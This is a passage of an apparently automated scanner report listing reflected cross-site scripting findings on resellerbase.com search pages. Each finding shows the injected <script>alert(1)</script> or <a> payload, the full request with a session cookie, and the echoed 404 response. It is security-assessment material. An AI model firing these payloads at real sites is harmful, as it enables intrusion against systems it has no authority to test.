2.2970. http://www.resellerbase.com/detail/41/themes/kosmos/images/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 45dc8<script>alert(1)</script>6447f3a1b2b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/kosmos/images/search.php45dc8<script>alert(1)</script>6447f3a1b2b?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/images/search.php45dc8<script>alert(1)</script>6447f3a1b2b?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2971. http://www.resellerbase.com/detail/41/themes/kosmos/images/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload e2ee3<a>c7738e9a554 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/41/themes/kosmos/images/search.php?keyword=search...&Submit3=Searche2ee3<a>c7738e9a554&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/images/search.php?keyword=search...&Submit3=Searche2ee3<a>c7738e9a554&opt=2 was not found on this server.</p>
...[SNIP]...

2.2972. http://www.resellerbase.com/detail/41/themes/kosmos/images/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 7388c<a>f3ba16fca91 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/41/themes/kosmos/images/search.php?keyword=search...7388c<a>f3ba16fca91&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/images/search.php?keyword=search...7388c<a>f3ba16fca91&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2973. http://www.resellerbase.com/detail/41/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1daa2<script>alert(1)</script>8626d619202 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&1daa2<script>alert(1)</script>8626d619202=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&1daa2<script>alert(1)</script>8626d619202=1 was not found on this server.</p>
...[SNIP]...

2.2974. http://www.resellerbase.com/detail/41/themes/kosmos/images/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 38efb<a>44779053653 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/41/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=238efb<a>44779053653 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=238efb<a>44779053653 was not found on this server.</p>
...[SNIP]...

2.2975. http://www.resellerbase.com/detail/41/themes/kosmos/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fcac5<script>alert(1)</script>adf595f10b7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailfcac5<script>alert(1)</script>adf595f10b7/41/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailfcac5<script>alert(1)</script>adf595f10b7/41/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2976. http://www.resellerbase.com/detail/41/themes/kosmos/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e7021<script>alert(1)</script>f2346cf5b75 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41e7021<script>alert(1)</script>f2346cf5b75/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41e7021<script>alert(1)</script>f2346cf5b75/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2977. http://www.resellerbase.com/detail/41/themes/kosmos/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 62079<script>alert(1)</script>56c6b6a0845 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes62079<script>alert(1)</script>56c6b6a0845/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes62079<script>alert(1)</script>56c6b6a0845/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2978. http://www.resellerbase.com/detail/41/themes/kosmos/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 304bb<script>alert(1)</script>69609dc9298 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/kosmos304bb<script>alert(1)</script>69609dc9298/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos304bb<script>alert(1)</script>69609dc9298/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2979. http://www.resellerbase.com/detail/41/themes/kosmos/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload d038f<script>alert(1)</script>eff29015fdb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/kosmos/search.phpd038f<script>alert(1)</script>eff29015fdb?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/search.phpd038f<script>alert(1)</script>eff29015fdb?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2980. http://www.resellerbase.com/detail/41/themes/kosmos/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload e28f1<a>8b66a261991 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/41/themes/kosmos/search.php?keyword=search...&Submit3=Searche28f1<a>8b66a261991&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/search.php?keyword=search...&Submit3=Searche28f1<a>8b66a261991&opt=2 was not found on this server.</p>
...[SNIP]...

2.2981. http://www.resellerbase.com/detail/41/themes/kosmos/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload bc2eb<a>1002f605cca was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/41/themes/kosmos/search.php?keyword=search...bc2eb<a>1002f605cca&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/search.php?keyword=search...bc2eb<a>1002f605cca&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2982. http://www.resellerbase.com/detail/41/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a5889<script>alert(1)</script>c1e96bcb97b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&a5889<script>alert(1)</script>c1e96bcb97b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&a5889<script>alert(1)</script>c1e96bcb97b=1 was not found on this server.</p>
...[SNIP]...

2.2983. http://www.resellerbase.com/detail/41/themes/kosmos/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload d01b8<a>33d5290c243 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/41/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2d01b8<a>33d5290c243 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2d01b8<a>33d5290c243 was not found on this server.</p>
...[SNIP]...

2.2984. http://www.resellerbase.com/detail/41/themes/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c6631<script>alert(1)</script>f1a3aba9b34 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailc6631<script>alert(1)</script>f1a3aba9b34/41/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailc6631<script>alert(1)</script>f1a3aba9b34/41/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2985. http://www.resellerbase.com/detail/41/themes/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 422ca<script>alert(1)</script>f72b76e42f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41422ca<script>alert(1)</script>f72b76e42f/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41422ca<script>alert(1)</script>f72b76e42f/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2986. http://www.resellerbase.com/detail/41/themes/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b22d4<script>alert(1)</script>f84aee3ac64 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themesb22d4<script>alert(1)</script>f84aee3ac64/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themesb22d4<script>alert(1)</script>f84aee3ac64/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2987. http://www.resellerbase.com/detail/41/themes/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9b8cf<script>alert(1)</script>c56e052362b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/search.php9b8cf<script>alert(1)</script>c56e052362b?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/search.php9b8cf<script>alert(1)</script>c56e052362b?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2988. http://www.resellerbase.com/detail/41/themes/search.php [Submit3 parameter]
